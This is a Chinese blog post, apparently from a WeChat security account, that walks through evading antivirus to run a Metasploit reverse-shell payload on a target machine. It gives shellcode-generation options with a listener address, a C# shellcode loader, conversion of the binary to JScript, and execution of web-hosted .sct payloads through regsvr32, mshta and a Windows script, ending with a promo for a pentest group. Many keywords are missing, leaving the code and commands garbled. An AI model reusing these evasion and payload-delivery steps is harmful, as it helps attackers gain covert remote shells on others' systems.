免杀/免杀-小白漏洞笔记

免杀/免杀-小白漏洞笔记

MSF 已经是广为人知的非常流行的渗透平台，没有之一。而作为专注于后渗透的我，最常用的也是 MSF 强大的后渗透功能。在实战当中，经常需要在目标环境中获取一个 的 shell。那么我面临的第一个问题，就是如何安安稳稳地、神不知鬼不觉地在目标环境中执行 的 。目前网上流行的免杀和隐蔽执行的思路有很多，今天我给大家介绍一下我屡试不爽的猥琐流方法。

一、准备

这个过程比较简单，大多数人应该都会。我们这里使用 生成一个 x86 的 的 为例，直接上命令：

-p // -a x86 -f -- -o https. -b "\x00\xff" LHOST=192.168.1.222 LPORT=443 =true =.exe

大部分参数都不用过多解释了，常用 MSF 的人都知道。需要说明的是，我们要借助于 C# 来执行生成的 ，所以格式要选择为 ，而最后两个参数（ 和 ）是指明 执行后要将自己注入到一个新创建的宿主 .exe 进程中去。

生成的结果如下图（cat 命令显示的结果有问题，不用管它）：

二、准备 C# 工程

我们需要创建一个 C# 工程，我这里使用 2017。新建一个空白的 C# 的 工程，.Net 版本选择 2.0（保证兼容性）。

将如下代码黏贴覆盖到 .cs 中：

using ;

using .;

using ..;

class

()

();

void ()

byte[] = {

//Paste your here

};

= (()0, (uint)Math.Max(., ), , 0x40);

.Copy(, 0, , .);

(()0, 0, , ()0, 0, ()0);

.Sleep(2000);

void Main()

[(".dll")]

( , uint , uint , uint );

[(".dll")]

( , uint , , , uint , );

然后将先前生成的 的黏贴到代码中注释为“//Paste your here”的地方。保存代码后，修改该工程的属性，将输出类型改为“ 应用程序”，启动对象改为“.”, 然后保存。 增加 版的 x86 编译对象，然后生成出 .exe。

三、转换 .exe 为 js 文件

这里要用到一个非常流弊的工具 ，这是一款可以将 .net 程序转换为 代码的。工具下载地址：

使用如下命令进行转换：

F:\t00ls>.exe -l= -o=.js -c=. .exe

然后我们就可以用下面的命令执行我们的 MSF ：

C:\\\.exe /e: .js

这里一定要注意，因为我们生成的 跟 exe 都是 32 位的，所以这里也要用 32 的 .exe 去执行。切记！

四、进一步猥琐化

sct 大法

既然能够转换为 js 代码，那么我们自然会想到 sct 大法的应用。我们将转换后的 js 代码黏贴到下面代码中的“//paste code here”：

保存为 msf.sct（后缀名可以更改，比如 jpg 等）并上传至 Web 然后在目标机器上执行如下命令：

F:\t00ls>c:\\\ /s /u /n /i: c:\\\.dll

Bingo！

另外，我们也可以使用 或者 的方式来深度利用，这里我们要使用 .exe 的 -m 参数来生成 文件，命令如下：

.exe -m -o=msf2.sct -c=. .exe

将 msf2.sct 文件上传到 Web 上，然后用如下命令在目标环境中执行：

F:\t00ls>c:\\\.exe :"\..\, ";.write();(":");this.close()

Bingo!Bingo!

当然，如果目标环境是 7 以上版本，还可以这样：

F:\t00ls>c:\\\.exe c:\\\ts\zh-CN\.vbs 127.0.0.1 :

Bingo!Bingo!Bingo!

五、关于深度免杀

一般情况下按照上述方法，基本就可以免杀了。如果还有特殊要求的话，可以考虑做如下的额外工作：

总之，一旦将二进制的东西变成脚本之后，免杀起来就会非常的简单！自己去发挥吧！

后记：

答应老余同学从我的 圈子分享点干货出来，这是第一篇，我的圈子里有很多干货，如果对渗透测试感兴趣的可以加入，但是有个前提：加入必须有分享，前期对分享质量不会强要求，首先得学会分享。

微信扫描上面这个二维码加入。要了解这个圈子可以看之前的文章：。

-----------------

微信公众号「Lazy-」

几个黑客在维护，都很懒，都想改变点什么

~

网络安全学习，我们一起交流

~